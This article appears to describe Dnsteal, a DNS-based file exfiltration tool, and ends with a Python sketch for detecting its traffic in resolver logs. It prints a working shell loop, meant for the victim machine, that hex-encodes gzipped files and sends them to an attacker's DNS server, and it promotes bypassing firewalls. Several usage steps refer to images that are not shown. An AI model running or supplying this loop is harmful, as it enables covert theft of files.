Image credits: https://github.com/m57/dnsteal

Dnsteal

Usage Instructions

Features:

Support for multiple files

gzip compression supported

For multiple, gzip compressed files use as below:

https://github.com/m57/dnsteal

Data exfiltration, also called data extrusion, data exportation, or data theft, is the unauthorized transfer of data from a computer or other device. Data exfiltration is primarily a security breach that occurs when an individual’s or organization's data is illegally copied. Generally, data exfiltrations are targeted attacks where the hacker’s/cracker’s primary intent is to find and copy specific data from the target machine. Such a transfer may be manual and carried out by someone with physical access to a computer, or it may be automated and carried out through malicious programming over a network.

There are several methods for data exfiltration, but most of them will be blocked by endpoint security systems and firewall/IPS implementations. A new tool has been released aiming primarily to bypass all such protections and transfer data through seemingly harmless DNS requests.

According to the author, Dnsteal is a data exfiltration tool for stealthily sending files over DNS requests. Once set up and run successfully, it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Dnsteal is coded in Python and available on GitHub. The author gives an example of how to use this tool in the image below.

To begin with, the following command should be entered on the victim machine:

Dnsteal supports multiple files to be exfiltrated. Use as below.

It also supports compression of the file to allow for faster transfer speeds; this can be achieved using the "-z" switch:

Then on the victim machine send a gzipped file like below:

    for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done

For more details head over to the GitHub page.
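The loop above puts each line of xxd -p output (up to 60 hex characters) in the leftmost DNS label, which leaves a recognisable pattern in resolver logs. The following detection sketch is an added example, not code from Dnsteal or its author; the log format ("<client_ip> <query_name>"), the sample lines, the function name and the thresholds are all assumptions chosen for illustration.

```python
import re
from collections import defaultdict

# Leftmost label made only of hex byte pairs: 16 to 62 characters.
# xxd -p emits 60 hex characters per line, so full chunks are 60 long.
HEX_LABEL = re.compile(r"(?:[0-9a-f]{2}){8,31}")

# Constructed sample resolver log, one "<client_ip> <query_name>" per line.
SAMPLE_LOG = """\
10.0.0.5 www.example.org
10.0.0.5 1f8b08000000000000034b4c4a4e494d4bcfc8ccca06002a3b5c9e0a0000.payroll.csv.com
10.0.0.5 73656372657473a1b2c3d4e5f60718293a4b5c6d7e8f909192a3b4c5d6e7.payroll.csv.com
10.0.0.5 f8091a2b3c4d5e6f708192a3.payroll.csv.com
10.0.0.7 deadbeef.cdn.example.net
10.0.0.7 0123456789abcdef0123456789abcdef.static.example.net
"""


def find_hex_label_exfil(log_text, min_chunks=3):
    """Return {(client, parent_domain): (chunks, decoded_bytes)} for every
    client/parent pair that received at least min_chunks hex-only labels."""
    stats = defaultdict(lambda: [0, 0])
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # skip lines that do not fit the assumed format
        client, qname = parts
        label, _, parent = qname.lower().rstrip(".").partition(".")
        if parent and HEX_LABEL.fullmatch(label):
            entry = stats[(client, parent)]
            entry[0] += 1                 # one query = one chunk
            entry[1] += len(label) // 2   # two hex characters per byte
    return {k: tuple(v) for k, v in stats.items() if v[0] >= min_chunks}


if __name__ == "__main__":
    for (client, parent), (chunks, size) in find_hex_label_exfil(SAMPLE_LOG).items():
        print(f"{client} -> *.{parent}: {chunks} hex labels, ~{size} bytes")
```

A single hash-like label (as some CDNs use) stays below the chunk threshold, so min_chunks should be tuned against normal traffic; the final chunk of a file can also be shorter than 16 hex characters and will not be counted.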